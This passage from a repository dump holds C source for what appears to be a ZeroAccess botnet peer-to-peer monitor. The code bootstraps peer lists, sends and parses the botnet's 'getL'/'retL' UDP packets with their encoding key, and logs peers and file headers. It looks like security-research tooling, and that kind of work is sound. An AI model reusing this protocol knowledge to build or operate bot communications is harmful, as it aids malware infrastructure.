sizeof(packet));\n\t\tSfuDecodeStream((PBYTE)&packet, sizeof(packet), '1234');\n\n\t\t_strcpy(textbuf, TEXT(\"> sending getL -> \"));\n\t\tRtlIpv4AddressToStringW((const struct in_addr*)&io_addr.sin_addr, _strend(textbuf));\n\t\t_strcat(textbuf, TEXT(\":\"));\n\t\tultostr(ntohs(io_addr.sin_port), _strend(textbuf));\n\t\tSfUIAddEvent(ScanContext, GUI_EVENT_PACKET_SEND, textbuf);\n\n\t\tsendto(ScanContext->su, (const char *)&packet, sizeof(packet), 0, (struct sockaddr *)&io_addr, sizeof(io_addr));\n\n\t\tc += 1;\n\t\tif (c >= n) {\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_NEWROUND, TEXT(\"New round!\"));\n\t\t\t\n\t\t\tmemIO = 0;\n\t\t\tNtFreeVirtualMemory(NtCurrentProcess(), &CurrentState, &memIO, MEM_RELEASE);\n\t\t\tCurrentState = NULL;\n\n\t\t\tRtlEnterCriticalSection(&ScanContext->csTableLock);\n\n\t\t\tn = RtlNumberGenericTableElementsAvl(&ScanContext->PeersTable);\n\t\t\tmemIO = n * sizeof(ZA_PEERINFO);\n\t\t\tNtAllocateVirtualMemory(NtCurrentProcess(), &CurrentState, 0, &memIO, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\n\t\t\tif (CurrentState) {\n\t\t\t\tRtlSecureZeroMemory(CurrentState, memIO);\n\t\t\t\tfor (\n\t\t\t\t\tTableEntry = RtlEnumerateGenericTableAvl(&ScanContext->PeersTable, TRUE), c = 0;\n\t\t\t\t\tTableEntry != NULL;\n\t\t\t\t\tTableEntry = RtlEnumerateGenericTableAvl(&ScanContext->PeersTable, FALSE), c += 1)\n\t\t\t\t{\n\t\t\t\t\tRtlCopyMemory(&CurrentState[c], TableEntry, sizeof(ZA_PEERINFO));\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tRtlLeaveCriticalSection(&ScanContext->csTableLock);\n\n\t\t\t//memory error\n\t\t\tif (CurrentState == NULL)\n\t\t\t\tbreak;\n\n\t\t\tc = 0;\n\t\t\t_qsort(CurrentState, n, sizeof(ZA_PEERINFO), &SfQSortCompare);\n\n\t\t\tSleep(1000);\n\t\t\tcontinue;\n\t\t}\n\t\tSleep(1000);\n\t}\n\n\tSfUIAddEvent(ScanContext, GUI_EVENT_THREAD_TERMINATED, TEXT(\"getL thread terminated.\"));\n\treturn 0;\n}\n\n/*\n* SfNP2PListener\n*\n* Purpose:\n*\n* Listener thread.\n*\n*/\nDWORD WINAPI SfNP2PListener(\n\t_In_ PZA_SCANCTX ScanContext\n\t)\n{\n\tWCHAR textbuf[MAX_PATH];\n\tstruct sockaddr_in io_addr;\n\tint addr_len, recv_bytes;\n\tchar *recvbuffer = NULL, *sendbuffer = NULL;\n\tPZA_PACKET recvpacket, sendpacket;\n\tULONG crc, k, l;\n\tUSHORT Port;\n\tBOOL cond = FALSE;\n\tSIZE_T memIO;\n\tZA_PEERINFO in_peer;\n\n\tRtlSecureZeroMemory(&textbuf, sizeof(textbuf));\n\t_strcpy(textbuf, TEXT(\"> p2p listener thread started, sid=0x\"));\n\tultohex(ScanContext->SessionId, _strend(textbuf));\n\tSfUIAddEvent(ScanContext, GUI_EVENT_THREAD_STARTED, textbuf);\n\n\tdo {\n\n\t\tmemIO = UDP_BUFFER_SIZE;\n\t\tNtAllocateVirtualMemory(NtCurrentProcess(), &recvbuffer, 0, &memIO, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n\t\tif (recvbuffer == NULL)\n\t\t\tbreak;\n\n\t\tmemIO = UDP_BUFFER_SIZE;\n\t\tNtAllocateVirtualMemory(NtCurrentProcess(), &sendbuffer, 0, &memIO, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n\t\tif (sendbuffer == NULL)\n\t\t\tbreak;\n\n\t\trecvpacket = (PZA_PACKET)recvbuffer;\n\t\tsendpacket = (PZA_PACKET)sendbuffer;\n\n\t\tdo {\n\n\t\t\tRtlSecureZeroMemory(&io_addr, sizeof(io_addr));\n\t\t\taddr_len = sizeof(io_addr);\n\t\t\trecv_bytes = recvfrom(ScanContext->su, recvbuffer, UDP_BUFFER_SIZE, 0, (struct sockaddr *)&io_addr, &addr_len);\n\t\t\tif (recv_bytes <= 0)\n\t\t\t\tcontinue;\n\n\t\t\tPort = ntohs(io_addr.sin_port);\n\t\t\t_strcpy(textbuf, TEXT(\"> received packet <- \"));\n\t\t\tRtlIpv4AddressToStringW((const struct in_addr*)&io_addr.sin_addr, _strend(textbuf));\n\t\t\t_strcat(textbuf, TEXT(\":\"));\n\t\t\tultostr(Port, _strend(textbuf));\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_PACKET_RECV, textbuf);\n\n\t\t\tSfuDecodeStream((PBYTE)recvbuffer, recv_bytes, '1234');\n\t\t\tcrc = recvpacket->Header.CRC;\n\t\t\trecvpacket->Header.CRC = 0;\n\n\t\t\tif (RtlComputeCrc32(0, (PUCHAR)recvbuffer, recv_bytes) == crc) {\n\n\t\t\t\t_strcpy(textbuf, TEXT(\">> CRC-ok, cmd=\"));\n\t\t\t\tswitch (recvpacket->Header.Command) {\n\n\t\t\t\tcase 'getL':\n\t\t\t\t\t_strcat(textbuf, TEXT(\"getL\"));\n\t\t\t\t\tbreak;\n\t\t\t\tcase 'retL':\n\t\t\t\t\t_strcat(textbuf, TEXT(\"retL\"));\n\t\t\t\t\tbreak;\n\t\t\t\tdefault:\n\t\t\t\t\t_strcat(textbuf, TEXT(\"UnknownCmd\"));\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\t_strcat(textbuf, TEXT(\" size=\"));\n\t\t\t\tultostr(recv_bytes, _strend(textbuf));\n\t\t\t\t_strcat(textbuf, TEXT(\" sid=0x\"));\n\t\t\t\tultohex(recvpacket->Header.SessionID, _strend(textbuf));\n\t\t\t\t_strcat(textbuf, TEXT(\" opts=\"));\n\t\t\t\tultohex(recvpacket->Header.Opt1, _strend(textbuf));\n\t\t\t\t_strcat(textbuf, TEXT(\":\"));\n\t\t\t\tultohex(recvpacket->Header.Opt2, _strend(textbuf));\n\n\t\t\t\tif ((Port >= P2P_WIN32_PORT_RANGE_BEGIN) && (Port <= P2P_WIN32_PORT_RANGE_END)) {\n\t\t\t\t\t_strcat(textbuf, TEXT(\" (Win32 bot)\"));\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t\tif ((Port >= P2P_WIN64_PORT_RANGE_BEGIN) && (Port <= P2P_WIN64_PORT_RANGE_END)) {\n\t\t\t\t\t\t_strcat(textbuf, TEXT(\" (Win64 bot)\"));\n\t\t\t\t\t}\n\t\t\t\t\telse {\n\t\t\t\t\t\t_strcat(textbuf, TEXT(\" (Unknown bot port range)\"));\n\t\t\t\t\t}\n\n\t\t\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_PACKET_HEADER, textbuf);\n\n\t\t\t\t\tswitch (recvpacket->Header.Command) {\n\n\t\t\t\t\tcase 'getL':\n\n\t\t\t\t\t\tif ((recvpacket->Header.Opt2 & P2P_GETFILELIST) == 0) {\n\n\t\t\t\t\t\t\tsendpacket->Header.CRC = 0;\n\t\t\t\t\t\t\tsendpacket->Header.Command = 'retL';\n\t\t\t\t\t\t\tsendpacket->Header.SessionID = ScanContext->SessionId;\n\t\t\t\t\t\t\tsendpacket->Header.Opt1 = 0x0000;\n\t\t\t\t\t\t\tsendpacket->Header.Opt2 = recvpacket->Header.Opt2 & P2P_SESSION_MASK;\n\t\t\t\t\t\t\tRtlCopyMemory(&sendpacket->PeerList, ScanContext->LastPeerList, sizeof(sendpacket->PeerList));\n\t\t\t\t\t\t\tsendpacket->Header.CRC = RtlComputeCrc32(0, (PUCHAR)sendbuffer, sizeof(ZA_PACKET));\n\t\t\t\t\t\t\tSfuDecodeStream((PBYTE)sendbuffer, sizeof(ZA_PACKET), '1234');\n\t\t\t\t\t\t\tsendto(ScanContext->su, (const char *)sendbuffer, sizeof(ZA_PACKET), 0, (struct sockaddr *)&io_addr, addr_len);\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tcase 'retL':\n\n\t\t\t\t\t\tRtlCopyMemory(ScanContext->LastPeerList, recvpacket->PeerList, sizeof(ScanContext->LastPeerList));\n\n\t\t\t\t\t\tin_peer.IP = io_addr.sin_addr.S_un.S_addr;\n\t\t\t\t\t\tin_peer.Port = Port;\n\t\t\t\t\t\tin_peer.TimeStamp = 0;\n\n\t\t\t\t\t\tfor (k = 0; k < recvpacket->Header.Opt1; k++) {\n\t\t\t\t\t\t\tl = sizeof(ZA_PACKET) + (k + 1)*sizeof(ZA_FILEHEADER);\n\t\t\t\t\t\t\tif (l <= (ULONG)recv_bytes)\n\t\t\t\t\t\t\t\tSfNAddFileHeader(\n\t\t\t\t\t\t\t\t\tScanContext, \n\t\t\t\t\t\t\t\t\t(PZA_FILEHEADER)(recvbuffer + sizeof(ZA_PACKET) + k*sizeof(ZA_FILEHEADER)),\n\t\t\t\t\t\t\t\t\t&in_peer\n\t\t\t\t\t\t\t\t\t);\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tfor (k = 0; k < 16; k++)\n\t\t\t\t\t\t\tSfNAddToTable(ScanContext, &recvpacket->PeerList[k]);\n\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t}\n\t\t\telse {\n\t\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_ERROR, TEXT(\">> received CRC mismatch, corrupted packet header\"));\n\t\t\t}\n\n\t\t} while (!g_guictx.bShutdown);\n\n\t} while (cond);\n\n\tif (recvbuffer != NULL) {\n\t\tmemIO = 0;\n\t\tNtFreeVirtualMemory(NtCurrentProcess(), &recvbuffer, &memIO, MEM_RELEASE);\n\t}\n\n\tif (sendbuffer != NULL) {\n\t\tmemIO = 0;\n\t\tNtFreeVirtualMemory(NtCurrentProcess(), &sendbuffer, &memIO, MEM_RELEASE);\n\t}\n\tSfUIAddEvent(ScanContext, GUI_EVENT_THREAD_TERMINATED, TEXT(\"Listener thread terminated.\"));\n\treturn 0;\n}\n\n/*\n* SfNWorkerThread\n*\n* Purpose:\n*\n* Scan worker thread.\n*\n*/\nVOID WINAPI SfNWorkerThread(\n\t_In_ PZA_SCANCTX ScanContext\n\t)\n{\n\tBOOL cond = FALSE;\n\tSIZE_T sz;\n\tSOCKET su = INVALID_SOCKET;\n\tHANDLE hThread = NULL, hFile = NULL;\n\tULONG nBootstrap = 0, k;\n\tNTSTATUS status;\n\tPVOID Wow64 = NULL;\n\tPZA_PEERINFO Bootstrap = NULL;\n\tstruct sockaddr_in io_addr;\n\tUNICODE_STRING usName;\n\tOBJECT_ATTRIBUTES ObjectAttributes;\n\tIO_STATUS_BLOCK IoStatusBlock;\n\tFILE_STANDARD_INFORMATION fsi;\n\tWCHAR szText[MAX_PATH];\n\tBOOLEAN NewElement = FALSE;\n\n\tRtlInitializeCriticalSection(&ScanContext->csTableLock);\n\tRtlInitializeCriticalSection(&ScanContext->csTableDumpLock);\n\n\tdo {\n\n\t\tif (!CryptAcquireContext(&ScanContext->CryptoProv, NULL, MS_DEF_PROV, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))\n\t\t\tbreak;\n\n\t\tk = ~GetTickCount();\n\t\tScanContext->SessionId = RtlRandomEx(&k);\n\t\tif (!CryptGenRandom(ScanContext->CryptoProv, (DWORD)sizeof(ULONG), (BYTE*)&ScanContext->SessionId))\n\t\t\tbreak;\n\n\t\tif (!CryptImportKey(ScanContext->CryptoProv, (const BYTE *)RSA_KEY, sizeof(RSA_KEY), 0, 0, &ScanContext->CryptoKey))\n\t\t\tbreak;\n\n\n\t\tRtlInitializeGenericTableAvl(&ScanContext->PeersTable,\n\t\t\t(PRTL_AVL_COMPARE_ROUTINE)&SfAvlCompareCallback,\n\t\t\t(PRTL_AVL_ALLOCATE_ROUTINE)&SfAvlAllocateCallback,\n\t\t\t(PRTL_AVL_FREE_ROUTINE)&SfAvlFreeCallback,\n\t\t\t(PVOID)ScanContext);\n\n\t\tRtlInitializeGenericTableAvl(&ScanContext->PeersTableDump,\n\t\t\t(PRTL_AVL_COMPARE_ROUTINE)&SfAvlCompareCallback,\n\t\t\t(PRTL_AVL_ALLOCATE_ROUTINE)&SfAvlAllocateCallback,\n\t\t\t(PRTL_AVL_FREE_ROUTINE)&SfAvlFreeCallback,\n\t\t\t(PVOID)ScanContext);\n\n\t\t_strcpy(szText, TEXT(\"Loading bootstrap list \"));\n\t\t_strcat(szText, P2P_BOOTSTRAP_NAME);\n#ifdef _WIN64\n\t\t_strcat(szText, TEXT(\", running in x86-64 mode\"));\n#else\n\t\t_strcat(szText, TEXT(\", running in x86-32 mode\"));\n#endif\n\t\tSfUIAddEvent(NULL, GUI_EVENT_INFORMATION, szText);\n\t\t\n\t\tusName.Buffer = P2P_BOOTSTRAP_NAME;\n\t\tusName.Length = sizeof(P2P_BOOTSTRAP_NAME) - sizeof(WCHAR);\n\t\tusName.MaximumLength = usName.Length + sizeof(UNICODE_NULL);\n\t\tInitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, ScanContext->RootDirectoryHandle, NULL);\n\t\tif (!NT_SUCCESS(SfuLoadPeerList(&ObjectAttributes, &Bootstrap, &nBootstrap))) {\n\t\t\tSfUIAddEvent(NULL, GUI_EVENT_ERROR, TEXT(\"Could not read bootstrap peer list.\"));\n\t\t\tbreak;\n\t\t}\n\n\t\t_strcpy(szText, TEXT(\"Bootstrap loaded OK, peers count: \"));\n\t\tultostr(nBootstrap, _strend(szText));\n\t\tSfUIAddEvent(NULL, GUI_EVENT_INFORMATION, szText);\n\n\t\t_qsort(Bootstrap, nBootstrap, sizeof(ZA_PEERINFO), SfQSortCompare);\n\t\t//SfuWriteBufferToFile(L\"test64.bin\", Bootstrap, nBootstrap * sizeof(ZA_PEERINFO), FALSE, FALSE);\n\t\tfor (k = 0; k < nBootstrap; k++) {\n\t\t\tNewElement = FALSE;\n\t\t\tif (!RtlInsertElementGenericTableAvl(&ScanContext->PeersTable, &Bootstrap[k], sizeof(ZA_PEERINFO), &NewElement))\n\t\t\t\tbreak;\n\t\t}\n\n\t\tsz = 0;\n\t\tNtFreeVirtualMemory(NtCurrentProcess(), &Bootstrap, &sz, MEM_RELEASE);\n\t\tBootstrap = NULL;\n\n\t\t_strcpy(szText, TEXT(\"Loading dumped bootstrap list \"));\n\t\t_strcat(szText, P2P_BOOTSTRAP_SAVE_NAME);\n\t\tSfUIAddEvent(NULL, GUI_EVENT_INFORMATION, szText);\n\n\t\tusName.Buffer = P2P_BOOTSTRAP_SAVE_NAME;\n\t\tusName.Length = sizeof(P2P_BOOTSTRAP_SAVE_NAME) - sizeof(WCHAR);\n\t\tusName.MaximumLength = usName.Length + sizeof(UNICODE_NULL);\n\t\tstatus = NtCreateFile(&hFile, FILE_READ_ACCESS | FILE_WRITE_ACCESS | SYNCHRONIZE, &ObjectAttributes,\n\t\t\t&IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF,\n\t\t\tFILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n\t\tif (!NT_SUCCESS(status)) {\n\t\t\tSfUIAddEvent(NULL, GUI_EVENT_ERROR, TEXT(\"Could not create output peer list.\"));\n\t\t\tbreak;\n\t\t}\n\t\tScanContext->DumpFileHandle = hFile;\n\n\t\tRtlSecureZeroMemory(&fsi, sizeof(fsi));\n\t\tif (NT_SUCCESS(NtQueryInformationFile(hFile, &IoStatusBlock, &fsi, sizeof(fsi), FileStandardInformation))) {\n\n\t\t\tsz = fsi.EndOfFile.LowPart;\n\t\t\tif ((sz % sizeof(ZA_PEERINFO)) == 0) {\n\n\t\t\t\tBootstrap = NULL;\n\t\t\t\tNtAllocateVirtualMemory(NtCurrentProcess(), &Bootstrap, 0, &sz, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\n\t\t\t\tif (Bootstrap) {\n\t\t\t\t\tif (NT_SUCCESS(NtReadFile(hFile, NULL, NULL, NULL, &IoStatusBlock, Bootstrap, fsi.EndOfFile.LowPart, NULL, NULL))) {\n\t\t\t\t\t\tnBootstrap = fsi.EndOfFile.LowPart / sizeof(ZA_PEERINFO);\n\t\t\t\t\t\t\n\t\t\t\t\t\t_strcpy(szText, TEXT(\"Dump bootstrap loaded OK, peers count: \"));\n\t\t\t\t\t\tultostr(nBootstrap, _strend(szText));\n\t\t\t\t\t\tSfUIAddEvent(NULL, GUI_EVENT_INFORMATION, szText);\n\n\t\t\t\t\t\tfor (k = 0; k < nBootstrap; k++) {\n\t\t\t\t\t\t\tNewElement = FALSE;\n\t\t\t\t\t\t\tif (!RtlInsertElementGenericTableAvl(&ScanContext->PeersTableDump, &Bootstrap[k], sizeof(ZA_PEERINFO), &NewElement))\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tsz = 0;\n\t\t\t\t\tNtFreeVirtualMemory(NtCurrentProcess(), &Bootstrap, &sz, MEM_RELEASE);\n\t\t\t\t\tBootstrap = NULL;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tsu = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n\t\tif (su == INVALID_SOCKET)\n\t\t\tbreak;\n\n\t\tScanContext->su = su;\n\n\t\tRtlSecureZeroMemory(&io_addr, sizeof(io_addr));\n\t\tio_addr.sin_family = AF_INET;\n\t\tio_addr.sin_port = htons((u_short)UDP_PORT);\n\t\tif (bind(su, (struct sockaddr *)&io_addr, sizeof(io_addr)) != 0)\n\t\t\tbreak;\n\n\t\tNtQueryInformationProcess(NtCurrentProcess(), ProcessWow64Information, &Wow64, sizeof(PVOID), NULL);\n\n\t\t_strcpy(szText, TEXT(\"ZeroAccess monitor, mode=\"));\n\t\tultostr((Wow64 != NULL) ? 32 : 64, _strend(szText));\n\t\t_strcat(szText, TEXT(\", port: \"));\n\t\tultostr(UDP_PORT, _strend(szText));\n\t\t_strcat(szText, TEXT(\", sid=0x\"));\n\t\tultohex(ScanContext->SessionId, _strend(szText));\n\t\t\n\t\tSetWindowText(g_guictx.MainWindow, szText);\n\n\t\thThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&SfNgetLSender, (LPVOID)ScanContext, 0, NULL);\n\t\tif (hThread != NULL) {\n\t\t\tCloseHandle(hThread);\n\t\t}\n\n\t\thThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&SfNP2PListener, (LPVOID)ScanContext, 0, NULL);\n\t\tif (hThread != NULL) {\n\t\t\tCloseHandle(hThread);\n\t\t}\n\n\t\twhile (g_guictx.bShutdown == FALSE) {\n\t\t\tSleep(1000);\n\t\t}\n\n\t} while (cond);\n\n\t//cleanup\n\n\tif (su != INVALID_SOCKET) {\n\t\tshutdown(su, SD_BOTH);\n\t\tclosesocket(su);\n\t}\n\n\tif (ScanContext->RootDirectoryHandle != NULL) {\n\t\tNtClose(ScanContext->RootDirectoryHandle);\n\t}\n\n\tif (ScanContext->DumpFileHandle != NULL) {\n\t\tNtClose(ScanContext->DumpFileHandle);\n\t}\n\n\tif (Bootstrap != NULL) {\n\t\tsz = 0;\n\t\tNtFreeVirtualMemory(NtCurrentProcess(), &Bootstrap, &sz, MEM_RELEASE);\n\t}\n\n\tif (ScanContext->CryptoKey) {\n\t\tCryptDestroyKey(ScanContext->CryptoKey);\n\t}\n\n\tif (ScanContext->CryptoProv) {\n\t\tCryptReleaseContext(ScanContext->CryptoProv, 0);\n\t}\n\n\tRtlDeleteCriticalSection(&ScanContext->csTableLock);\n\tRtlDeleteCriticalSection(&ScanContext->csTableDumpLock);\n}\n\n/*\n* SfNStartup\n*\n* Purpose:\n*\n* Create/Open directories and start worker thread.\n*\n*/\nBOOL SfNStartup(\n\t_In_ ZA_SCANCTX *ScanContext\n\t)\n{\n\tUNICODE_STRING usName;\n\tANSI_STRING str;\n\tNTSTATUS status;\n\tHANDLE RootDirectoryHandle = NULL;\n\tIO_STATUS_BLOCK IoStatusBlock;\n\tOBJECT_ATTRIBUTES ObjectAttributes;\n\tPVOID DllImageBase = NULL;\n\tBOOL bResult = FALSE, cond = FALSE;\n\n\tRtlSecureZeroMemory(&usName, sizeof(usName));\n\n\tdo {\n\n\t\tRtlInitUnicodeString(&usName, L\"ntdll.dll\");\n\t\tif (NT_SUCCESS(LdrGetDllHandle(NULL, NULL, &usName, &DllImageBase))) {\n\t\t\tRtlInitString(&str, \"qsort\");\n\t\t\tLdrGetProcedureAddress(DllImageBase, &str, 0, (PVOID)&_qsort);\n\t\t\tif (_qsort == NULL) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\tbResult = RtlDosPathNameToNtPathName_U(\n\t\t\tRtlGetCurrentPeb()->ProcessParameters->CurrentDirectory.DosPath.Buffer,\n\t\t\t&usName, NULL, NULL\n\t\t\t);\n\t\tif (bResult == FALSE)\n\t\t\tbreak;\n\n\t\tInitializeObjectAttributes(&ObjectAttributes,\n\t\t\t&usName,\n\t\t\tOBJ_CASE_INSENSITIVE, 0, NULL);\n\n\t\tstatus = NtCreateFile(&RootDirectoryHandle,\n\t\t\tFILE_GENERIC_READ | FILE_GENERIC_WRITE,\n\t\t\t&ObjectAttributes,\n\t\t\t&IoStatusBlock,\n\t\t\tNULL,\n\t\t\tFILE_ATTRIBUTE_READONLY,\n\t\t\tFILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n\t\t\tFILE_OPEN,\n\t\t\tFILE_DIRECTORY_FILE,\n\t\t\tNULL,\n\t\t\t0\n\t\t\t);\n\n\t\tRtlFreeUnicodeString(&usName);\n\n\t\tif (!NT_SUCCESS(status))\n\t\t\tbreak;\n\t\n\t\tusName.Buffer = L\"U\";\n\t\tusName.Length = 2;\n\t\tusName.MaximumLength = 4;\n\t\tObjectAttributes.RootDirectory = RootDirectoryHandle;\n\t\tbResult = SfuCreateDirectory(&ObjectAttributes);\n\t\tif (bResult) {\n\t\t\t/*we dont use*/\n\t\t\tusName.Buffer = L\"L\";\n\t\t\tObjectAttributes.RootDirectory = RootDirectoryHandle;\n\t\t\tbResult = SfuCreateDirectory(&ObjectAttributes);\n\t\t\tif (bResult == FALSE) {\n\t\t\t\tSfUIAddEvent(NULL, GUI_EVENT_ERROR, TEXT(\"Could not create working L directory.\"));\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\telse {\n\t\t\tSfUIAddEvent(NULL, GUI_EVENT_ERROR, TEXT(\"Could not create working U directory.\"));\n\t\t\tbreak;\n\t\t}\n\n\t} while (cond);\n\n\tif (!bResult) {\n\t\tif (RootDirectoryHandle)\n\t\t\tNtClose(RootDirectoryHandle);\n\t}\n\telse {\n\t\tif (RootDirectoryHandle) {\n\t\t\tScanContext->RootDirectoryHandle = RootDirectoryHandle;\n\t\t}\n\t}\n\n\treturn bResult;\n}\n\n/*\n* SfNMain\n*\n* Purpose:\n*\n* Scan entry point.\n*\n*/\nVOID SfNMain(\n\tVOID\n\t)\n{\n\tHANDLE hThread;\n\n\tRtlSecureZeroMemory(&g_zascan, sizeof(g_zascan));\n\tSfNStartup(&g_zascan);\n\tif (SfInitMD5()) {\n\t\thThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&SfNWorkerThread, &g_zascan, 0, NULL);\n\t\tif (hThread) {\n\t\t\tCloseHandle(hThread);\n\t\t}\n\t}\n}\n"
},
{
"path": "Source/Yuudachi/p2p.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n* TITLE: P2P.H\n*\n* VERSION: 1.01\n*\n* DATE: 01 Dec 2016\n*\n* P2P header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#include \"..\\shared\\global.h\"\n#include \"..\\shared\\za_rkey.h\"\n\n//some consts, we tested it and it looks ok (c)\n\n#define UDP_BUFFER_SIZE\t\t 4096\n#define MAXIMUM_FILES 32\n#define RECV_BUFFER_SIZE 262144\n\n//client udp port\n\n#ifdef _WIN64\n#define UDP_PORT 45167\n#else\n#define UDP_PORT 21833\n#endif\n\n//client tcp port\n#define TCP_PORT UDP_PORT\n\n//p2p protocol const\n\n#define P2P_GETFILELIST 0x8000\n#define P2P_SESSION_MASK 0x03ff\n\n//upd port possible ranges\n\n#define P2P_WIN32_PORT_RANGE_BEGIN 0x4000\n#define P2P_WIN32_PORT_RANGE_END 0x7fff\n#define P2P_WIN64_PORT_RANGE_BEGIN 0x8000\n#define P2P_WIN64_PORT_RANGE_END 0xbfff\n\n//udp port adjust value\n\n#ifdef _WIN64\n#define P2P_UDP_PORT_ADJUST 0x8000\n#else\n#define P2P_UDP_PORT_ADJUST 0x4000\n#endif\n\n//bootstrap\n\n#ifdef _WIN64\n#define P2P_BOOTSTRAP_NAME TEXT(\"s64\")\n#else\n#define P2P_BOOTSTRAP_NAME TEXT(\"s32\")\n#endif\n\n#ifdef _WIN64\n#define P2P_BOOTSTRAP_SAVE_NAME TEXT(\"out64\")\n#else\n#define P2P_BOOTSTRAP_SAVE_NAME TEXT(\"out32\")\n#endif\n\n//crypto key\n\n#ifdef _WIN64\n#define RSA_KEY ZA_key64\n#else\n#define RSA_KEY ZA_key32\n#endif\n\ntypedef struct _ZA_SCANCTX {\n SOCKET su;\n ULONG NumberOfFiles;\n ULONG SessionId;\n HCRYPTPROV CryptoProv;\n HCRYPTKEY CryptoKey;\n HANDLE DumpFileHandle;\n HANDLE RootDirectoryHandle;\n CRITICAL_SECTION csTableLock;\n CRITICAL_SECTION csTableDumpLock;\n RTL_AVL_TABLE PeersTable;\n RTL_AVL_TABLE PeersTableDump;\n ZA_PEERINFO\t LastPeerList[16];\n ZA_FILEHEADER FileHeaders[MAXIMUM_FILES];\n} ZA_SCANCTX, *PZA_SCANCTX;\n\nBOOL SfNStartup(\n _In_ ZA_SCANCTX *ScanContext\n);\n\nVOID SfNMain(\n VOID\n);\n"
},
{
"path": "Source/Yuudachi/za.manifest",
"content": "\n\n \n ZeroAccess \n \n \n \n \t\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \n\n"
},
{
"path": "Source/ZeroAccess.sln",
"content": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio 14\nVisualStudioVersion = 14.0.24720.0\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"minirtl\", \"minirtl\", \"{ED3257FC-CB8E-4406-8BCE-F3E5500B41F8}\"\n\tProjectSection(SolutionItems) = preProject\n\t\tminirtl\\_filename.c = minirtl\\_filename.c\n\t\tminirtl\\_filename.h = minirtl\\_filename.h\n\t\tminirtl\\_strcat.c = minirtl\\_strcat.c\n\t\tminirtl\\_strcmp.c = minirtl\\_strcmp.c\n\t\tminirtl\\_strcmpi.c = minirtl\\_strcmpi.c\n\t\tminirtl\\_strcpy.c = minirtl\\_strcpy.c\n\t\tminirtl\\_strend.c = minirtl\\_strend.c\n\t\tminirtl\\_strlen.c = minirtl\\_strlen.c\n\t\tminirtl\\_strncmp.c = minirtl\\_strncmp.c\n\t\tminirtl\\_strncmpi.c = minirtl\\_strncmpi.c\n\t\tminirtl\\_strncpy.c = minirtl\\_strncpy.c\n\t\tminirtl\\_strstr.c = minirtl\\_strstr.c\n\t\tminirtl\\_strstri.c = minirtl\\_strstri.c\n\t\tminirtl\\cmdline.c = minirtl\\cmdline.c\n\t\t..\\minirtl\\cmdline.h = ..\\minirtl\\cmdline.h\n\t\tminirtl\\cmdline.h = minirtl\\cmdline.h\n\t\tminirtl\\hextou64.c = minirtl\\hextou64.c\n\t\tminirtl\\hextoul.c = minirtl\\hextoul.c\n\t\tminirtl\\i64tostr.c = minirtl\\i64tostr.c\n\t\tminirtl\\itostr.c = minirtl\\itostr.c\n\t\t..\\minirtl\\minirtl.h = ..\\minirtl\\minirtl.h\n\t\tminirtl\\minirtl.h = minirtl\\minirtl.h\n\t\t..\\minirtl\\rtltypes.h = ..\\minirtl\\rtltypes.h\n\t\tminirtl\\rtltypes.h = minirtl\\rtltypes.h\n\t\tminirtl\\strtoi.c = minirtl\\strtoi.c\n\t\tminirtl\\strtoi64.c = minirtl\\strtoi64.c\n\t\tminirtl\\strtou64.c = minirtl\\strtou64.c\n\t\tminirtl\\strtoul.c = minirtl\\strtoul.c\n\t\tminirtl\\u64tohex.c = minirtl\\u64tohex.c\n\t\tminirtl\\u64tostr.c = minirtl\\u64tostr.c\n\t\tminirtl\\ultohex.c = minirtl\\ultohex.c\n\t\tminirtl\\ultostr.c = minirtl\\ultostr.c\n\tEndProjectSection\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Umikaze\", \"Umikaze\\Umikaze.vcxproj\", \"{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Shigure\", \"Shigure\\Shigure.vcxproj\", \"{77AD1A3E-BA02-4376-976D-BA356F98F32F}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = 